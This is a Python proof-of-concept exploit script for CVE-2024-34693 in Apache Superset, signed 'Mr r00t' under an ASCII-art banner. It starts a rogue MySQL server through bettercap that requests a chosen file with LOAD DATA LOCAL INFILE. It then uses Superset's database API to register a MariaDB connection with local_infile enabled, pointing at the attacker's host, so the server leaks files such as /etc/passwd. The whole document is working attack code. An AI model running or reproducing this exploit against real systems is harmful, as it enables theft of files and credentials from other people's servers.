exploit_cve_2024_34693.py

import argparse
import requests
import subprocess
from colorama import Fore, Style

def setup_rogue_mysql_server(file_to_exfiltrate):
    print("[*] Setting up Rogue MySQL Server with Bettercap...")
    bettercap_command = [
        "sudo", "bettercap", "-eval",
        f"mysql.server on; set mysql.server.commands LOAD DATA LOCAL INFILE '/{file_to_exfiltrate}' INTO TABLE mysql.users;"
    ]
    subprocess.run(bettercap_command)

def create_mariadb_connection(superset_url):
    print("[*] Creating malicious MariaDB connection...")
    malicious_url = f"{superset_url}/api/v1/database"
    payload = {
        "database_name": "malicious_db",
        "sqlalchemy_uri": "mariadb://172.17.0.1/malicious_db?local_infile=1",
        "extra": "{}",
        "allow_dml": True,
        "expose_in_sqllab": True,
        "impersonate_user": False
    }

    headers = {
        "Content-Type": "application/json"
    }

    response = requests.post(malicious_url, json=payload, headers=headers)

    if response.status_code == 201:
        print("[+] Successfully created malicious MariaDB connection.")
    else:
        print(f"[-] Failed to create malicious MariaDB connection: {response.status_code}")
        print(response.text)

def main():
    parser = argparse.ArgumentParser(description="Exploit CVE-2024-34693 in Apache Superset")
    parser.add_argument("superset_url", help="Base URL of the Apache Superset instance (e.g., http://localhost:8088)")
    parser.add_argument("file_to_exfiltrate", help="Path of the file to exfiltrate from the target system (e.g., /etc/passwd)")
    args = parser.parse_args()

    setup_rogue_mysql_server(args.file_to_exfiltrate)
    create_mariadb_connection(args.superset_url)

if __name__ == "__main__":
    print(f"""{Fore.BLUE}

 ██████ ██    ██ ███████       ██████   ██████  ██████  ██   ██       ██████  ██   ██  ██████   █████  ██████  
██      ██    ██ ██                 ██ ██  ████      ██ ██   ██            ██ ██   ██ ██       ██   ██      ██ 
██      ██    ██ █████   █████  █████  ██ ██ ██  █████  ███████ █████  █████  ███████ ███████   ██████  █████  
██       ██  ██  ██            ██      ████  ██ ██           ██            ██      ██ ██    ██      ██      ██ 
 ██████   ████   ███████       ███████  ██████  ███████      ██       ██████       ██  ██████   █████  ██████  
{Style.RESET_ALL}---------------------- proof of concept to exploit apache superset by Mr r00t --------------------------------
""")
    main()